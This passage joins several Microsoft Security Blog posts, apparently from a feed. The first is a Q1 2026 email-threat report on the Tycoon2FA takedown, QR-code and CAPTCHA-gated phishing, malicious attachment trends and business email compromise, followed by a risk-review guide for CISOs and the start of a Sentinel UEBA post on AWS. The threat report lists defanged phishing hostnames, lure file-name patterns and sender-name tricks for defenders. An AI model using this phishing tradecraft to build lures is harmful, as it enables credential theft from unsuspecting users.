These trends reflect how threat actors continue to iterate on both scale and delivery techniques to improve effectiveness. At the same time, disruption efforts can meaningfully impact this activity. Following Microsoft’s Digital Crime Unit-led action against the Tycoon2FA phishing-as-a-service (PhaaS) platform in early March, associated email volume declined 15% over the remainder of the month, alongside a significant reduction in access to active phishing pages, limiting the platform’s immediate effectiveness. While Tycoon2FA has since adapted by shifting hosting providers and domain registration patterns, these changes reflect partial recovery rather than full restoration of previous capabilities. Alongside these shifts, business email compromise (BEC) activity remained prevalent, totaling approximately 10.7 million attacks in the quarter, largely driven by low-effort, generic outreach messages. At the same time, Microsoft Defender Research observed early indications of emerging techniques such as device code phishing—sometimes enabled by offerings like EvilTokens—which, while not yet at the scale of the trends discussed below, reflect continued innovation in credential theft methods.

This blog provides a view of email threat activity across the first quarter of 2026, highlighting key trends in phishing techniques, payload delivery, and threat actor behavior observed by Microsoft Threat Intelligence. We examine shifts in QR code phishing, CAPTCHA evasion tactics, malicious payloads, and BEC activity, analyze how disruption efforts and infrastructure changes influenced threat actor operations, and provide recommendations and Microsoft Defender detections to help mitigate these threats. By bringing these trends together, this blog can help defenders understand how email-based attacks are evolving and where to focus detection, mitigation, and user protection strategies.

Tycoon2FA disruption impact

Since its emergence in August 2023, Tycoon2FA has rapidly become one of the most widespread PhaaS platforms, leveraging adversary-in-the-middle (AiTM) techniques to attempt to defeat non-phishing-resistant multifactor authentication (MFA) defenses. The group behind the PhaaS platform (tracked by Microsoft Threat Intelligence as Storm-1747) leases malicious infrastructure and sells phishing kits that impersonate various enterprise application sign-in pages and incorporate evasion tactics, such as fake CAPTCHA pages.

The quarter began with Tycoon2FA in a period of reduced activity. January volumes represented a 54% decline from December 2025, marking the second consecutive month of sharp decreases. While post-holiday seasonal effects may have contributed to this decrease in volume, some of the reduction might also have been the result of Microsoft’s Digital Crimes Unit disruption of RedVDS, a service used by many Tycoon2FA customers to distribute malicious email campaigns.

After surging 44% in February, phishing attacks pointing to Tycoon2FA fell 15% in March driven largely by the effects of a coordinated disruption operation. In early March 2026, Microsoft’s Digital Crimes Unit, in coordination with Europol and industry partners, took action to disrupt Tycoon2FA’s infrastructure and operations, significantly impairing the platform’s hosting capabilities. While Tycoon2FA-linked messages continued to circulate after the disruption, almost one-third of March’s total volume was concentrated in a three-day period early in the month; daily volumes for the remainder of March were notably lower than historical averages, and targets’ ability to reach active phishing pages was substantially reduced.

Line graph displays monthly phishing email volume from November to March for Tycoon2FA, showing a sharp decline from about 23 million in November to around 9 million in January, followed by a slight increase and stabilization near 11 million in February and March.
Figure 1. Tycoon2FA monthly malicious messages volume (November 2025 – March 2026)

Tycoon2FA’s infrastructure composition evolved multiple times during the first three months of 2026. In January, Tycoon2FA domains started shifting toward newer generic top-level domains (TLDs) such as .DIGITAL, .BUSINESS, .CONTRACTORS, .CEO, and .COMPANY, moving away from previous commonly used TLDs or second-level domains like .SA.COM, .RU, and .ES. This trend became even more well-established in February. Following the March disruption, however, Microsoft Threat Intelligence observed a notable increase in Tycoon2FA domains with .RU registrations, with more than 41% of all Tycoon2FA domains using a .RU TLD since the last week of March.

Line chart showing percentage trends of Tycoon2FA TLDs and 2LDs from November 2025 to March 2026, with six categories: SA.COM, RU, ES, DIGITAL, DE, and DEV. SA.COM starts highest near 22% and declines to about 6%, while RU rises sharply from 13% to 23% in March, with other categories remaining below 7% throughout.
Figure 2. Top TLDs and second-level domains (2LDs) associated with Tycoon2FA infrastructure (November 2025 – March 2026)

Additionally, toward the end of March, we saw Tycoon2FA moving away from Cloudflare as a hosting service and now hosts most of its domains across a variety of alternative platforms, suggesting the group is attempting to find replacement services that offer comparable anti-analysis protections.  

QR code phishing attacks

In recent years, QR codes have rapidly emerged as a preferred tool among phishing threat actors seeking to bypass traditional email defenses. By embedding malicious URLs within image-based QR codes in the body of an email or within the contents of an attachment, threat actors attempt to exploit the limitations of text-based scanning engines and redirect victims to phishing sites on unmanaged mobile devices.

The most significant shift in Q1 2026 was the rapid escalation of QR code phishing, with attack volumes increasing from 7.6 million in January to 18.7 million in March, a 146% increase over the quarter. After an initial 35% decline in January (continuing a late-2025 downtrend), volumes reversed course dramatically, growing 59% in February and another 55% in March. By the end of the quarter, QR code phishing had reached its highest monthly volume in at least a year.

Line graph showing weekly volume of QR-code phishing attacks from November 2025 to March 2026, with phishing email counts fluctuating and peaking in March 2026.
Figure 3. Trend of QR code phishing attacks by weekly volume (November 2025 – March 2026)

PDF attachments were the dominant delivery method throughout the quarter, growing from 65% of QR code attacks in January to 70% in March. While the overall volume of DOC/DOCX payloads containing malicious QR codes steadily increased each month, their share of overall delivery payloads decreased from 31% in January to 24% in March. A notable late-quarter development was the emergence of QR codes embedded directly in email bodies, which surged 336% in March. While still a small share of total volume (5%), this approach eliminates the need for an attachment altogether and highlights a shift in threat actor delivery methods that defenders should continue to monitor.

CAPTCHA tactics

Threat actors use CAPTCHA pages to delay detection and increase user interaction. These pages function as a visual decoy, giving the appearance of a legitimate security check while concealing a transition to malicious content. By forcing users to engage with the CAPTCHA before accessing the payload, threat actors reduce the likelihood of automated scanning tools identifying the threat and increase the chances of successful credential harvesting or malware delivery. Additionally, fake CAPTCHAs are used in ClickFix attacks to trick users into copying and executing malicious commands under the guise of human verification, allowing malware to bypass conventional security controls.

After declining in both January (-45%) and February (-8%), CAPTCHA-gated phishing volumes exploded in March, more than doubling (+125%) to 11.9 million attacks, the highest volume observed over the last year.

Line chart showing CAPTCHA-gated phishing volume between November 2025 and March 2026. The chart highlights a peak around December, a decline through January and February, followed by a sharp increase in March to over 12 million attacks.
Figure 4. CAPTCHA-gated phishing volume (November 2025 – March 2026)

The most notable aspect of Q1 CAPTCHA trends was the rapid rotation of delivery methods, as threat actors appeared to actively experiment with which payload formats most effectively evade email defenses:

  • HTML attachments started the year as the most common method to deliver CAPTCHA-gated phishing (37% in January), but dropped 34% in February, hitting its lowest monthly volume since August 2025. Although their volume more than doubled in March, hitting an annual monthly high, HTML files were still only the second-most common delivery method to close the quarter.
  • SVG files, which had seen consecutive months of decreasing volumes, grew by 49% in February at the same time nearly every other delivery payload type decreased. Because of this, it was the most common delivery method for the month, which had not happened since November 2025. This one-month spike reversed itself in March, however, and the number of SVG files delivering CAPTCHA-gated phish fell by 57%, accounting for just 7% of delivery payloads.
  • PDF files saw a meteoric rise in volume during the first quarter of the year. After seeing steady month-over-month declines since July 2025, and hitting an annual monthly low point in January 2026, the number of PDF attachments leading to CAPTCHA-gated phishing sites more than quadrupled in March (+356%). Not only did it retake its spot as the most common delivery method for these attacks since last July, but it eclipsed its annual high by more than 37%.
  • DOC/DOCX files, which didn’t make up more than 9% of CAPTCHA-gated phishing payloads over the previous nine months, increased almost five times (+373%) in March to account for 15% of payloads.
  • Email-embedded URLs, which had once delivered more than half of CAPTCHA-gated phish at the end of August 2025, hit an eight-month low after falling 85% between December and February. While their volume nearly doubled in March, they remained well below late-2025 levels.
Line graph comparing monthly data usage for five file types. XLS shows a sharp increase in March, PDF declines steadily, HTML peaks in December, and DOC/DOCX and URL remain relatively low with slight fluctuations.
Figure 5. Monthly CAPTCHA-gated phishing volume by distribution method (Q1 2026)

Another notable shift in CAPTCHA-gated phishing attacks was the erosion of Tycoon2FA’s impact on the landscape. At the end of 2025, more than three-quarters of CAPTCHA-gated phishing sites were hosted on Tycoon2FA infrastructure. This share decreased significantly over the course of the first three months of 2026, falling to just 41% in March. This broadening of CAPTCHA-gated phishing sites being used by an increasing number of threat actors and phishing kits, combined with the overall surge in volume, indicates that this technique is becoming a more entrenched component of the phishing playbook rather than a specialty of a small number of tools.

Three-day campaign delivers CAPTCHA-gated phishing content using malicious SVG attachments

Between February 23 and February 25, 2026, a large, sustained campaign sent more than 1.2 million messages to users at more than 53,000 organizations in 23 countries. Messages in the campaign included a number of different themes, including an important 401K update, a credit hold warning, a question about a received payment, a payment request for a past due invoice, and a voice message notification.

Many of the messages contained a fake confidentiality disclaimer to enhance the credibility of the messages and provide a proactive excuse about why a recipient may have mistakenly received an email that may not be applicable to them.

A screenshot of an email confidentiality notice warning recipients against sharing the message with third parties without sender consent. The text emphasizes the message's intended recipient, prohibits unauthorized distribution, and clarifies that the email does not constitute a legally binding agreement.
Figure 6. Example fake confidentiality message used in February 23-25 phishing campaign

Attached to each message was an SVG file that was named to appropriately match the theme of the email. All the file names included a Base64-encoded version of the recipient’s email address. Example of file names used in the campaign include the following:

  • <Recipient Email Domain>_statements_inv_<Base64-encoded Email Address>.svg
  • 401K_copy_<Recipient Name>_<Base64-encoded Email Address>_241.svg
  • Check_2408_Payment_Copy_<Recipient First Name>_<Base64-encoded Email Address>_241.svg
  • INV#_1709612175_<Base64-encoded Email Address>.svg
  • Listen_(<Base64-encoded Email Address>).svg
  • PLAY_AUDIO_MESSAGE__<Recipient Name>_<Base64-encoded Email Address>_241.svg

If an attached SVG file was opened, the user’s browser would open locally and fetch content from one of the three following hostnames:

  • bouleversement.niovapahrm[.]com
  • haematogenesis.hvishay[.]com
  • ubiquitarianism.drilto[.]com

Initially, the user would be shown a “security check” CAPTCHA. Once the CAPTCHA had been successfully completed, the user would then be shown a fake sign-in page used to compromise their account credentials.

Malicious payloads

Credential phishing tightened its grip on the malicious payload landscape across Q1, growing from 89% of all payload-based attacks in January to 95% in February before settling at 94% in March. These credential phishing payloads either linked users to phishing pages or locally loaded spoofed sign-in screens on a user’s device. Traditional malware delivery continued its long-term decline, representing just 5–6% of payloads by the end of the quarter.

Pie chart showing distribution of malicious payloads: HTML (31%), PDF (28%), SVG (19%), DOC/DOCX (12%), and URL (10%).
Figure 7. Malicious payloads by file type (Q1 2026)

The most striking payload trend was the volatility across file types, driven by large campaigns that created dramatic week-to-week swings:

  • HTML attachments started Q1 as the leading file type (37% of payloads in January), fell to an annual low in February (-57%), then nearly tripled in March (+175%). This volatility was largely campaign-driven, with concentrated activity in the first half of January and the third week of March.
  • Malicious PDFs followed a steady upward trajectory, increasing 38% in February and another 50% in March to reach their highest monthly volume in over a year. By March, PDFs accounted for 29% of payloads, up from 19% in January.
  • ZIP/GZIP attachments were similarly volatile by nearly doubling in January (+94%), dropping 38% in February, then surging 79% in March. Threat actors commonly use ZIP files to circumvent Mark of the Web (MOTW) protections.
  • SVG files emerged briefly in February as a notable delivery method (with a 50% volume increase) before declining 32% in March, mirroring the pattern seen in CAPTCHA-gated phishing.
Line graph showing daily usage trends of five file formats (DOC/DOCX, HTML, PDF, SVG, and ZIP). HTML files exhibit the highest and most frequent spikes, reaching over 2 million, while other formats maintain lower, more stable usage with occasional peaks.
Figure 8. Daily malicious payload file type (Q1 2026)

Large-scale HTML phishing campaign hosts content on multiple PhaaS infrastructures

On March 17, 2026, Microsoft Threat Intelligence observed a massive phishing campaign that drove a significant surge in malicious HTML attachments during the month. The campaign involved more than 1.5 million confirmed malicious messages sent to over 179,000 organizations across 43 countries, accounting for approximately 7% of all malicious HTML attachments observed in March.

All messages in this campaign were likely sent using the same tool or service, which exhibited several distinct and highly consistent characteristics. Most notably, sender addresses across the campaign featured excessively long, keyword‑stuffed usernames that embedded URLs, tracking identifiers, and service references. These usernames were crafted to resemble legitimate transactional, billing, or document‑related notification senders. Examples of observed sender usernames include:

  • eReceipt_Payment_Alert_Noreply-/m939k6d7.r.us-west-2.awstrack.me/L0/%2F%2Fspectrumbusiness.net%2Fbilling%2F/2/010101989f2c1f29-ab5789bd-1426-4800-ae7d-877ea7f61d24-000000/LHnBIXX0VmCLVoXwNWtt23hGCdc=439/us02web.zoom.nl/j/81163775943?pwd=bLoo4JaWavsiTAuLWNoRsmbmALwjLB.1-qq8m2tzd
  • Center-=AAP1eU7NKykAABXNznVa8w___listenerId=AAP1eU7NKykAABXNznVa8w___aw_0_device.player_name=Chrome___aw_0_ivt.result=unknown___cbs=9901711___aw_0_azn.zposition=%5B%22undefined%22%5D___us_privacy=___aw_0_app.name=Second+Screen___externalClickUrl=otdk-takaki-h
  • DocExchange_Noreply-m939k6d7.r.us_west_2.awstrack.me/L0/%2F%2Fspectrumbusiness.net%2Fbilling%2F/2/010101989f2c1f29ab5789bd14264800ae7d877ea7f61d24000000/LHnBIXX0VmCLVoXwNWtt23hGCdc=439/us02web.zoom.nl/j/81163775943?pwd=bLoo4JaWavsiTAuLWNoRsmbmALwjLB.1-angie

The emails themselves contained little to no message body content. While subject lines varied, they consistently impersonated routine business and workflow notifications, including payment and remittance alerts (for example, Automated Clearing House (ACH), Electronic Funds Transfer (EFT), wire), invoice or aging statements, and e‑signature or document delivery requests. These subjects relied on urgency, approval language, and transactional framing to prompt recipients to review, sign, or access an attached document.

Each message included an HTML attachment with a file name aligned to the email’s theme. When opened, the HTML file launched locally on the recipient’s device and immediately redirected the user to an initial external staging page. This page performed basic screening and then redirected the user to a secondary landing page hosting the phishing content. On the final landing page, users were presented with a CAPTCHA challenge before being directed to a fraudulent sign‑in page designed to harvest account credentials.

Interestingly, although messages in this campaign shared common tooling, structure, and delivery characteristics, the infrastructure hosting the final phishing payload was linked to multiple different PhaaS providers. Most observed phishing endpoints were associated with Tycoon2FA, while additional activity was linked to Kratos (formerly Sneaky2FA) and EvilTokens infrastructure.

Business email compromise

Microsoft defines business email compromise (BEC) as a text-based attack targeting enterprise users that impersonates a trusted entity for the purpose of persuading a recipient into initiating a fraudulent financial transaction or sending the threat actor sensitive documents. These attacks fluctuated across Q1, totaling approximately 10.7 million attacks: rising 24% in January, dipping 8% in February, then surging 26% in March.

Line chart displays monthly BEC attack volume data for five months, with attacks starting high in November, dip in December, rise through January and February, and peak sharply in March to over 4 million attacks.
Figure 9. Monthly BEC attack volume (November 2025 – March 2026)

The composition of BEC attacks remained consistent throughout Q1. Generic outreach messages (like “Are you at your desk?”) accounted for 82–84% of initial contact emails each month, while explicit requests for specific financial transactions or documents represented just 9–10%. This pattern underscores that BEC operators overwhelmingly favor establishing a conversational rapport before making fraudulent requests, rather than leading with direct financial asks.

Within the smaller subset of explicit financial requests, two sub-categories showed notable movement. Payroll update requests grew 15% in February, reaching their highest volume in eight months, potentially reflecting tax season-related social engineering. Gift card requests fell 37% in February to their lowest level since July before rebounding sharply in March (+108%), though they still represented less than 3% of overall BEC messages. These fluctuations suggest that BEC operators adjust their specific financial pretexts seasonally while maintaining a consistent overall approach.

Pie chart displays BEC email content distribution for Q1 2026. Generic outreach contact dominates at 83.1%, followed by generic task request at 7.0%, payroll update at 4.2%, invoice payment at 3.1%, gift card request at 2.2%, and other at 0.4%, with each segment color-coded and labeled.
Figure 10. Initial BEC email content by type (Q1 2026)

Defending against email threats

Microsoft recommends the following mitigations to reduce the impact of this threat.

  • Review the recommended settings for Exchange Online Protection and Microsoft Defender for Office 365 to ensure your organization has established essential defenses and knows how to monitor and respond to threat activity.
  • Invest in user awareness training and phishing simulations. Attack simulation training in Microsoft Defender for Office 365, which also includes simulating phishing messages in Microsoft Teams, is one approach to running realistic attack scenarios in your organization.
  • Enable Zero-hour auto purge (ZAP) in Defender for Office 365 to quarantine sent mail in response to newly acquired threat intelligence and retroactively neutralize malicious phishing, spam, or malware messages that have already been delivered to mailboxes.
  • Responders could also manually check for and purge unwanted emails containing URLs and/or Subject fields that are similar, but not identical, to those of known bad messages. Investigate malicious email that was delivered in Microsoft 365 and use Threat Explorer to find and delete phishing emails.
  • Turn on Safe Links and Safe Attachments in Microsoft Defender for Office 365.
  • Enable network protection in Microsoft Defender for Endpoint.
  • Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
  • Enable password-less authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support password-less. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. Refer to this article for the different authentication methods and features.
  • Configure automatic attack disruption in Microsoft Defender XDR. Automatic attack disruption is designed to contain attacks in progress, limit the impact on an organization’s assets, and provide more time for security teams to remediate the attack fully.

Microsoft Defender detections

Microsoft Defender customers can refer to the list of applicable detections below. Microsoft Defender coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.

Microsoft Defender for Endpoint

The following alert might indicate threat activity associated with this threat. The alert, however, can be triggered by unrelated threat activity.

  • Suspicious activity likely indicative of a connection to an adversary-in-the-middle (AiTM) phishing site

Microsoft Defender for Office 365

The following alerts might indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity.

  • A potentially malicious URL click was detected
  • A user clicked through to a potentially malicious URL
  • Suspicious email sending patterns detected
  • Email messages containing malicious URL removed after delivery
  • Email messages removed after delivery
  • Email reported by user as malware or phish

Microsoft Security Copilot

Microsoft Security Copilot is embedded in Microsoft Defender and provides security teams with AI-powered capabilities to summarize incidents, analyze files and scripts, summarize identities, use guided responses, and generate device summaries, hunting queries, and incident reports.

Customers can also deploy AI agents, including the following Microsoft Security Copilot agents, to perform security tasks efficiently:

Security Copilot is also available as a standalone experience where customers can perform specific security-related tasks, such as incident investigation, user analysis, and vulnerability impact assessment. In addition, Security Copilot offers developer scenarios that allow customers to build, test, publish, and integrate AI agents and plugins to meet unique security needs.

Threat intelligence reports

Microsoft Defender XDR customers can use the following Threat Analytics reports in the Defender portal (requires license for at least one Defender XDR product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender XDR threat analytics

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.

The post Email threat landscape: Q1 2026 trends and insights appeared first on Microsoft Security Blog.

8 best practices for CISOs conducting risk reviews

The Deputy CISO blog series is where Microsoft Deputy Chief Information Security Officers (CISOs) share their thoughts on what is most important in their respective domains. In this series, you will get practical advice, tactics to start (and stop) deploying, forward-looking commentary on where the industry is going, and more. In this blog, Rico Mariani, Deputy CISO for Microsoft Security Products, Research Infrastructure, and Engineering Systems shares some of his best practices and expertise in conducting risk reviews.

The nature of cyberthreats has never been static, but it’s hard to accurately convey the scale of their recent evolution and proliferation. As we’ve seen in many other arenas, AI has become a very powerful productivity tool for would-be cybercriminals. Between April 2024 and April 2025, Microsoft stopped $4 billion in fraud attempts.1 And as of the writing of the Microsoft Digital Defense Report 2025, we are tracking 100 trillion security signals each day (a 40% increase since 2023).2

This is why I decided to write a blog about risk reviews. By asking the right questions, risk reviews help us transform the utility of our security data from primarily reactive remediation and response information into key insights helping to inform our proactive security stances. And embracing strong proactive security is something we can all do to mitigate our increased exposure to security threats.  

Risk reviews are also a topic I’ve lent focus to during my first six months as Deputy CISO for Microsoft Security. It’s a very interesting role for me, as I’ve traditionally described myself as performance specialist and a systems specialist more than a security specialist. It’s not necessarily a distinction of skill set, but more one of mindset, and what I’d like to share with you is actually a bit of a synthesis of my inherent performance- and systems-first way of thinking and things I’ve brought into that practice after working with many of the other Microsoft Deputy CISOs over the last few months.

There are roughly eight points I want to bring up concerning risk reviews in this blog. Each point has the potential to help expose potential security vulnerabilities when brought up with security teams. Together, they represent a structured and approachable way to initiate necessary conversations and drive meaningful results:

  1. Assets
  2. Applications 
  3. Authentication 
  4. Authorization 
  5. Network isolation 
  6. Detections 
  7. Auditing 
  8. Things not to miss 

Now, why did I choose to highlight these areas and not others? Generally, I find that looking at problems from the lens of risk management gives me a fresh perspective. When you very consistently ask specific questions around these areas, they often effectively start the conversation you want to have.

Just one last thing before we dive in: What I’m about to tell you is only approximately correct. There will be edge cases and exceptions, but generally I think you’ll find this information helpful.

1. Assets

The best place to start a review is identifying the assets that you need to protect. This will largely define the scope of the review. A good place to find those assets is, of course, on your architecture diagrams and your threat models. The assets we’re talking about could be storage (where perhaps you’re storing sensitive or otherwise important data) or they could be highly-privileged applications like command-and-control systems or something similar. This is, in short, the list of things that your cyberattacker wants to get to. 

2. Applications

In the next step, you identify your applications. These are, broadly speaking, the active part of your system. They are the outward-facing surfaces that customers will use and the set of microservices that support your interface. These systems could be providing any set of services that you might need—and herein lies the problem. It’s entirely normal for your applications to require access to your most important assets, but that means the applications themselves can become viable targets for a cyberattacker. So how do we make this situation better? At this point, it’s reasonable to start talking about possible controls. 

Read up on Zero Trust for source code access.

3. Good quality authentication 

The next thing you will want to inspect is the form of authentication that your system is using. The best systems are using tokens for authentication, and they are getting these tokens from standard token issuers like, for instance, Microsoft Entra. It’s sometimes viable to have your own token generation system, but remember that such systems tend to have bugs. Those bugs can be exploitable. And even lacking bugs, there could be, say, gaps or vulnerabilities in your token issuing system such that perhaps the tokens cannot be properly scoped. The tokens could also tend to be too long-lived, or difficult to be made fine-grained enough, or lack the capacity to allow for flowing user context from the request to the authorization system. Many such deficiencies are possible. 

Even with a good quality token issuing system, you can easily find yourself in a situation where the tokens that you’re creating are too fungible, or too powerful, or both. Thinking back to the assets you’re trying to protect and the applications that you have, you can likely categorize some of the applications as having more “power,” if you will, than others. Sometimes we call these “highly privileged applications” because they have the capability to do something that is especially of interest to cyberattackers, like reading a lot of data, changing configuration, or anything like that. 

To best manage the privileges associated with these applications, it needs to be the case that the kinds of tokens that they use are as limited as possible. So, a particular token might authorize a capability for a certain customer, on behalf of a certain user, for a certain set of data—and nothing more than that. When privileges are very generic, like “I can do this operation for anyone, anywhere,” things become much more dangerous. So, here the idea is to make sure that the tokens that you’re getting are very specific to the intent that you have and that only the applications that need those tokens can get them, and, again, the tokens are as limited as possible. This goes a long way in reducing the possible damage that a cyberattacker could do if they found such a token errantly stored somewhere. 

A lot of the things we think about when we’re working with tokens and trying to limit them fall into the category of limiting what a cyberattacker can do if they get a foothold somewhere. This is the Zero Trust model, where you assume breach everywhere.  

Additionally, it’s essential to use standard libraries to accurately authenticate with tokens, so that all the aspects and limitations of the token are certain to be honored. 

Learn about phishing-resistant multifactor authentication from the Microsoft Secure Future Initiative (SFI). 

4. Good quality authorization  

Good quality tokens are not going to help you if they’re enforced poorly (or not at all). And bugs can creep into code. Ad hoc authorization code can render the good authentication that you’ve done moot. 

Any time you can use declarative style patterns that help you verify tokens against incoming APIs and the data that the client is attempting to access with your API, you’ll find yourself in a better place. Simple, consistent authorization yields fewer bugs and therefore less risk. 

5. Network isolation 

In addition to having good quality tokens, it’s important to isolate the pieces of your environment to the maximum extent possible. Again, this is done because it’s prudent to assume that a cyberattacker has a foothold somewhere in your network. The questions are “where exactly can that foothold be,” and “once they have that foothold, where in my network can they get to?” If a threat actor can reach any part of your system from any other part of your system, this is obviously less good than if your most sensitive systems can be accessed from exactly one or two key places and nowhere else. When properly controlled, most footholds become useless to a cyberattacker—or at least only indirectly useful.  

Use service tags to create boundaries around your various assets such that applications are used by exactly those systems that are supposed to be using them and data is accessed by exactly those applications that are supposed to be accessing the data. This goes a long way to take many cyberthreats off the table.  

Network isolation can happen at several levels in the network stack. Popularly, level 7 is used at the perimeter. Maybe this manifests as some kind of HTTP proxy, for example, or an HTTP routing gateway. However, protection is incomplete without additional work happening at level 3 within your network. You want to limit IP traffic to be going to exactly the places that you want it to go. You might use techniques like virtual LANs, or similar constructs like network security groups (NSGs) in Microsoft Azure. The idea is to limit connectivity to exactly what is necessary to do the job and not give the cyberattacker freedom to move around. 

With good network isolation comes the ability to log any attempts to gain access at the perimeter, and potentially even internally. Depending on what networking technology you’re using, all of this is great for hunting. We’ll talk about that in the next section.  

Learn more about network isolation and other best practices from SFI.

6. Detections  

It’s normal to think about monitoring for reliability. Systems need to stay within their operating parameters in the face of changes and external conditions. But it’s also important to think about detection from the perspective of your threat model. If you identify five or ten risks in your threat model that need controls, it’s useful to think about how you might detect if any of those things are actually happening in your environment.  

In this context, one place to look is at the perimeter—by examining your incoming HTTP traffic, for instance. But you can also look anywhere in your environment where you predict that attacks might happen. You might look for badly formatted requests, or fuzzing, or evidence of DDoS attack—whatever is appropriate to the risks you have. The idea is that you want to be able to create alerts if you have evidence of a threat actor operating in your estate.  

And, of course, security products can be very helpful here.  

7. Auditing

We separate the notions of auditing from detection. Specifically, auditing is what I will call the pieces of data that you would use after a breach to determine the extent of the breach and the customers that were affected by it. In the event that you find a vulnerability without any evidence of threat actor exploitation, you’d want to go and check your auditing again to verify those claims. That way you can have evidence that whatever problem you found was not in fact exploited. If it was exploited, you’ll know to what extent, who was affected, and who needs to be notified. 

Some parts of your endpoint detection and response (EDR) stream will be very useful for auditing. Additional auditing information can come from the logs you create in your applications that record suitable information concerning recent activity. 

8. Things not to miss 

It’s important to think about all the applications and data that you have in your estate. For instance, it’s easy to overlook the backup data that you have stored. A cyberattacker might not be able to get access to your primary systems but might find that your backups are entirely unprotected and they can just read the backup.

Similarly, support systems often go overlooked. There are frequently important customer support scenarios that require access, and it’s easy to fall into the trap of not giving those systems the highest level of scrutiny. 

We should add systems that are under development and test systems to this problematic set. In both these cases, the code that’s running those systems is less trustworthy than normal production code. Development code, for instance, can be presumed to have more bugs than production code. Some of those bugs might be authorization bugs. And if there are authorization bugs, that buggy code might provide access to important assets. Therefore, your plans should include even greater scrutiny when it comes to these kinds of systems. 

Explore actionable patterns and practices from SFI

In summary

If you’ve gotten as far as identifying all of your assets, all your applications, and then thinking about the access patterns and controls that you have between them—including authentication, authorization, network isolation, and the use of bug-resistant patterns—you’re in a pretty good place to write a risk summary that can guide your actions for many months. And we haven’t even touched on basic things like vulnerability management, security, bug management, and the usual software lifecycle things that are necessary to keep the system in good health. Combine all of the above and you should have a good-looking risk plan. 

Microsoft
Deputy CISOs

To hear more from Microsoft Deputy CISOs, check out the OCISO blog series:

To stay on top of important security industry updates, explore resources specifically designed for CISOs, and learn best practices for improving your organization’s security posture, join the Microsoft CISO Digest distribution list.

Man with smile on face working with laptop

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity. 


1Microsoft Cyber Signals Issue 9

2Microsoft Digital Defense Report 2024.

The post 8 best practices for CISOs conducting risk reviews appeared first on Microsoft Security Blog.

Simplifying AWS defense with Microsoft Sentinel UEBA

With the expansion of Microsoft Sentinel UEBA (User and Entity Behavior Analytics) into new data sources, spanning multi-cloud (AWS, GCP), identity providers (Okta), and authentication logs (Microsoft Defender for Endpoint DeviceLogon, Microsoft Entra ID Managed Identity, Service Principal sign-ins), defenders can now detect behavioral anomalies across hybrid environments from a single place.

We’ve also expanded AWS coverage with more anomalies, enrichments and insights, so CloudTrail events now arrive with more built-in context at ingestion time. This lets defenders triage suspicious activity faster without building and maintaining large baselines in KQL.

Many defenders analyze CloudTrail activity using thresholds or historical patterns to identify unusual behavior. In dynamic cloud environments, interpreting this activity can be challenging without additional behavioral context.

Microsoft Sentinel UEBA shifts the burden away from query authors by enriching raw AWS logs with simple binary insights (true/false) derived from user, activity, and device behavior patterns – such as first-time geography, uncommon ISP, unusual action, and abnormal operation volume. Detection authors can stack these binary signals or combine them with built-in UEBA anomalies to surface attacker behavior that would otherwise blend into routine CloudTrail activity.

In this post, you’ll learn how binary feature stacking works, how UEBA baselines AWS identities (human and non-human), and how to use UEBA enrichments and built-in anomalies to strengthen AWS detections and triage.

Defenders investigating AWS activity often rely on raw CloudTrail logs, static thresholds, or manually-engineered baselines to differentiate between normal operational patterns and adversary behavior. While CloudTrail captures rich activity data, defenders often need behavioral context – such as historical usage patterns, geography, and device signals – to distinguish routine operations from suspicious behavior. This is where Microsoft Sentinel UEBA adds value.

Microsoft Sentinel UEBA enriches raw AWS logs with simple, binary behavioral insights (true/false) derived from baseline user, peer, and device behavior patterns – such as first-time geography, uncommon ISP, unusual action, and abnormal operation volume. These clear binary signals help establish behavioral context and inform investigation and detection decisions. This post refers to this approach as binary feature stacking.

Under the hood: The tables

Microsoft Sentinel UEBA surfaces AWS behavioral context in two tables: BehaviorAnalytics and Anomalies.

BehaviorAnalytics table

The BehaviorAnalytics table is the primary investigation surface for UEBA-enriched AWS activity. EventSource field identifies the log source (for example, AWSCloudTrail), ActivityType maps to service level AWS EventSource (for example, S3, KMS, or IAM), and ActionType captures the AWS API name (for example, ConsoleLogin or CreateUser). Use these fields to filter and scope specific categories of AWS activity.

Figure 1: BehaviorAnalytics table schema.

UEBA provides enrichments in three dynamic fields (UserInsights, DeviceInsights and ActivityInsights)– most importantly ActivityInsights, a JSON property bag that contains the binary behavioral features used for baseline-driven profiling. These enrichments are calculated at the user and tenant (AWS AccountId) level, as well as the activity level (for example, uncommon high volume of operations). Each enrichment uses a different baseline window, ranging from 7 days to 180 days.

This data is always available for hunting, even if no alert is fired. Each record includes key fields from the original CloudTrail event alongside enrichments derived from user, activity, and device behavior. The full list of available enrichments and their baseline lookback periods is documented in Entity enrichments – dynamic fields.

Anomalies table

The Anomalies table contains outputs from Microsoft’s pre-trained anomaly detection machine learning models. Six built-in anomalies are currently available for AWS. For more information about these anomalies, see: Anomalies detected by the Microsoft Sentinel machine learning engine.

Figure 2: Anomalies table schema.

Each anomaly record includes MITRE ATT&CK mappings, behavioral enrichments, an AnomalyScore, and AnomalyReasons, which explains why an event was flagged as an anomaly.

